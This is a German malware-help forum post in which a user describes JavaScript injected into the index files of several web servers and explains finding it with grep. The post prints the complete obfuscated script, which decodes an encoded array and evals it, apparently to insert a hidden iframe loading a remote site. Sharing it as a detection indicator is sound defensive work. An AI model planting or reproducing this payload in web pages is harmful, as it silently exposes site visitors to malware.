Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum
Schadstoffcode iauf meinem Webserver

Schadstoffcode iauf meinem Webserver


Diskussionsforum: Schadstoffcode iauf meinem Webserver

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

Antwort
Alt 27.01.2013, 11:53   #1
gecko08
 
Schadstoffcode iauf meinem Webserver - Standard

Schadstoffcode iauf meinem Webserver


Moin,

mein erster Post, obwohl ich seit Jahren sporadisch hier mitlese. Also höchste Zeit...

Den Java-Script-Schadcode hatte ich auch auf einigen Servern, konnte aber über "grep" die infizierten Dateien ausfindig machen und den Code löschen. Seitdem ist Ruhe. Es wurden alle "index.html" und "index.php" infiziert.

Der Code war folgender und fast immer direkt am Anfang der Datei:
Code:
ATTFilter
<script>try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(zxc){for(i=0;i-646!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}}</script>
2 der Server wurden von mir mittels ftp bedient, der 3. ist nie von mir besucht worden und ich hab den Auftrag bekommen, den code zu beseitigen. Wenn man mit metager nach dem Code sucht (z.B.: "catch(dgsgsdg)") , sind einige Webseiten befallen und Google zeigt eine Warnung an.

lg und schönen Sonntag noch, gecko

Antwort

Themen zu Schadstoffcode iauf meinem Webserver
entdeck, folge, folgende, folgenden, heute, html, script, webserver


« Man-in-the-browser Attacke | Logfile-Auswertung: Grundlagen erlernen »


Ähnliche Themen: Schadstoffcode iauf meinem Webserver


  1. Virus auf Webserver möglich?
    Plagegeister aller Art und deren Bekämpfung - 04.06.2014 (3)
  2. Schadsoftware auf Webserver (PHP)
    Alles rund um Mac OSX & Linux - 23.05.2014 (5)
  3. JS/EXP.Redir.EL.7 auf Webserver - wie vorgehen?
    Plagegeister aller Art und deren Bekämpfung - 04.06.2013 (1)
  4. Kritische Lücke im Webserver nginx
    Nachrichten - 07.05.2013 (0)
  5. Geknackte Webserver als Malware-Schleudern
    Nachrichten - 06.03.2013 (0)
  6. Webserver infiziert? Malware globalconferencemanagementgroup.com
    Plagegeister aller Art und deren Bekämpfung - 02.01.2013 (3)
  7. Rootkit befällt Linux-Webserver
    Nachrichten - 20.11.2012 (0)
  8. Sicherheitslücke auf Webserver der Schufa
    Nachrichten - 12.06.2011 (0)
  9. Webserver der Bundesfinanzagentur offen wie ein Scheunentor
    Nachrichten - 11.03.2011 (0)
  10. HTML / Infected.WebPage.Gen auf meinem Apache Webserver gemeldet von Google
    Plagegeister aller Art und deren Bekämpfung - 21.02.2011 (5)
  11. Apache Webserver Online bringen
    Alles rund um Windows - 24.01.2011 (10)
  12. JS:Illredir-W auf Webserver
    Plagegeister aller Art und deren Bekämpfung - 24.02.2010 (1)
  13. JS:Redirect-AM[Trj] auf Webserver von Versatel ohne php, css und js
    Plagegeister aller Art und deren Bekämpfung - 10.01.2010 (1)
  14. lokaler webserver? trojaner? dienst?
    Plagegeister aller Art und deren Bekämpfung - 11.03.2009 (1)
  15. Webserver -> Trojaner
    Plagegeister aller Art und deren Bekämpfung - 19.10.2008 (1)
  16. Trojaner auf dem Webserver
    Plagegeister aller Art und deren Bekämpfung - 14.01.2008 (2)
  17. Gentoo vs Debian auf einem Webserver
    Alles rund um Mac OSX & Linux - 16.12.2003 (20)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema Schadstoffcode iauf meinem Webserver - Moin, mein erster Post, obwohl ich seit Jahren sporadisch hier mitlese. Also höchste Zeit... Den Java-Script-Schadcode hatte ich auch auf einigen Servern, konnte aber über "grep" die infizierten Dateien ausfindig - Schadstoffcode iauf meinem Webserver...
Archiv
Du betrachtest: Schadstoffcode iauf meinem Webserver auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132